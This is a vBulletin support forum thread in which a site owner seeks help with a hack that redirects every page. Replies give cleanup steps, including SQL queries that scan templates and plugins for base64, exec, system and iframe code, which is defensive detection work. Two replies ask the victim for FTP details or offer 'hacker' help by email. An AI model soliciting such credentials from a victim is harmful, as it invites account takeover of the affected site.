Announcement

Collapse
No announcement yet.

Site Hacked

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #16
    Follow these steps.
    Originally posted by Wayne Luke View Post
    Here are the steps to check for hacks:

    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

    Query for step 4 and 5 -
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

    7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there. This isn't a vBulletin issue but customers really don't understand that.



    After a few quick checks, it looks like a basic template replacement scheme. Step 7 should expose such a scheme.
    Originally posted by sdfontanini View Post
    Updated again to 4.1.9 and it looks like I now have access to the AdminCP


    But where to go from here???
    Also make sure that your master password has been changed to something that you know but others don't. Same with your own password.
    Aussiefootyforums

    New Site New forum
    Come and talk sports all day long


    Comment


    • #17
      I do not believe this is a hack, frankly, a ridiculous thread was opened, the first ad does not put any sane hackers hack the pages. The second issue here in the form of hacking a site that has been opened and the solution is not sought.

      If you are really hacking, please send me the FTP details. How to Hack if a site is the site for you, I'd saved.

      Comment


      • #18
        Originally posted by Seo Engineer View Post
        I do not believe this is a hack, frankly, a ridiculous thread was opened, the first ad does not put any sane hackers hack the pages. The second issue here in the form of hacking a site that has been opened and the solution is not sought.

        If you are really hacking, please send me the FTP details. How to Hack if a site is the site for you, I'd saved.
        That makes no sense

        Comment


        • #19
          I've got other sites on my server and none of them are affected by this, can't understand how this redirect works, and why it's only affecting my vbulletin page

          I've checked my cpanel and no redirects were made, I'm stumped
          www.coloradoevo.com

          Comment


          • #20
            When I ran a diagnostics on file versions I noticed

            index.php - File does not contain expected contents...

            this is confusing since it's a copy right from the 4.1.9 update
            www.coloradoevo.com

            Comment


            • #21
              Every page gets redirected back to this Hacker Main Page
              www.coloradoevo.com

              Comment


              • #22
                can someone post their .htaccess code, not sure what it's suppose to look like
                www.coloradoevo.com

                Comment


                • #23
                  Originally posted by sdfontanini View Post
                  I get a 404 Error in my browser when I go to www.coloradoevo.com/admincp

                  This is getting frustrating...

                  I can not find any index.html files in my root folder, not sure how this thing is working... completely baffled
                  Your forums are installed in http://www.coloradoevo.com/forums/. So your admincp would be http://www.coloradoevo.com/forums/admincp/

                  Originally posted by sdfontanini View Post
                  can someone post their .htaccess code, not sure what it's suppose to look like
                  Not sure what you mean... it will be different per site.
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API

                  Comment


                  • #24
                    Check your template spacer_open. I cleaned up a forum this morning with a similar redirect. There was base64 enocoded code in that template causing every page to rediect because every forum page uses that template.

                    Use phpmyadmin to check your template table manually if you have to- look for spacer_open, and see if you have encoded text.

                    Comment


                    • #25
                      Originally posted by BirdOPrey5 View Post
                      Check your template spacer_open. I cleaned up a forum this morning with a similar redirect. There was base64 enocoded code in that template causing every page to rediect because every forum page uses that template.

                      Use phpmyadmin to check your template table manually if you have to- look for spacer_open, and see if you have encoded text.
                      I don't see any anomalies,


                      <!-- open content container -->
                      <if condition="$show['old_explorer']">
                      <table cellpadding="0" cellspacing="0" border="0" width="$stylevar[outertablewidth]" align="center"><tr><td class="page" style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px">
                      <else />
                      <div align="center">
                      <div class="page" style="width:$stylevar[outerdivwidth]; text-align:$stylevar[left]">
                      <div style="padding:0px $stylevar[spacersize]px 0px $stylevar[spacersize]px" align="$stylevar[left]">
                      </if>
                      www.coloradoevo.com

                      Comment


                      • #26
                        Is the problem Solved !!
                        Cuz i was a Hacker and i know what Hackers DO
                        so I can Help u [email protected] !

                        Comment


                        • #27
                          I believe they used Perl to overwrite or mask my pages forum directory

                          I deleted a few directories that weren't originally in the root folder including

                          perl
                          perl5



                          Now I have the following additional folders

                          .cpan - deleted
                          .HttpRequest
                          .MirrorSearch
                          Last edited by sdfontanini; Sat 14 Jan '12, 4:47pm.
                          www.coloradoevo.com

                          Comment


                          • #28
                            Went through these steps with no luck


                            Originally posted by wayne luke View Post
                            here are the steps to check for hacks:

                            1) run suspect file diagnostics under maintenance -> diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vbulletin and that you can't identify as belonging to your addons.

                            deleted all suspected files

                            2) check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

                            Updated as i updated vbulletin again to 4.1.10

                            3) search all templates for iframe tags. They should only appear in the following templates: Bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

                            there's a million templates, how would someone search through all of them?

                            4) check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

                            Not sure how to do this step

                            5) check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

                            Disables all plugins

                            6) make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

                            Query for step 4 and 5 -
                            select title, phpcode, hookname, product from plugin where phpcode like '%base64%' or phpcode like '%exec%' or phpcode like '%system%' or phpcode like '%pass_thru%' or phpcode like '%iframe%';

                            7) run this query: Select styleid, title, template from template where template like '%base64%' or template like '%exec%' or template like '%system%' or template like '%pass_thru%' or template like '%iframe%';

                            it checks the templates for compromising code.

                            Lost with this one

                            8) check .htaccess to make sure there are no redirects there. This isn't a vbulletin issue but customers really don't understand that.


                            my .htaccess file is completely empty, nothing in the file......

                            After a few quick checks, it looks like a basic template replacement scheme. Step 7 should expose such a scheme.
                            www.coloradoevo.com

                            Comment


                            • #29
                              When I re-ran the suspect file versions,these files were again suspect

                              forum.php File not recognized as part of vBulletin
                              index.php File does not contain expected contents
                              /clientscript
                              vbulletin-read-marker.js File not recognized as part of vBulletin
                              vbulletin-threadbit.js File not recognized as part of vBulletin
                              vbulletin_global.js File not recognized as part of vBulletin
                              ./includes/cron
                              vbcms_dailycleanup.php File not recognized as part of vBulletin
                              Please Help my forum has now been down almost a month and people are getting sorta upset.
                              www.coloradoevo.com

                              Comment


                              • #30
                                Steps 3,4,5,6,& 7 which involve 'looking' in the templates or plugins for things mean you need to look at these things in the database. Run a query in your template table looking for 'iframe' or in your plugins looking for 'base64'. You may want to consider hiring someone to do this if you aren't wanting to learn (google is a BIG help here!) how to do this yourself.


                                Easiest thing would have been to upload a database backup from before you were hacked (which you seem to have never made). Please do yourself a favor and spend the time right now that you would normal spend on your forum and learn how to make database backups and how to import them into a new database. It will be time well spent for the next time this may happen.

                                Please don't PM or VM me for support - I only help out in the threads.
                                vBulletin Manual & vBulletin 4.0 Code Documentation (API)
                                Want help modifying your vbulletin forum? Head on over to vbulletin.org
                                If I post CSS and you don't know where it goes, throw it into the additional.css template.

                                W3Schools &lt;- awesome site for html/css help

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X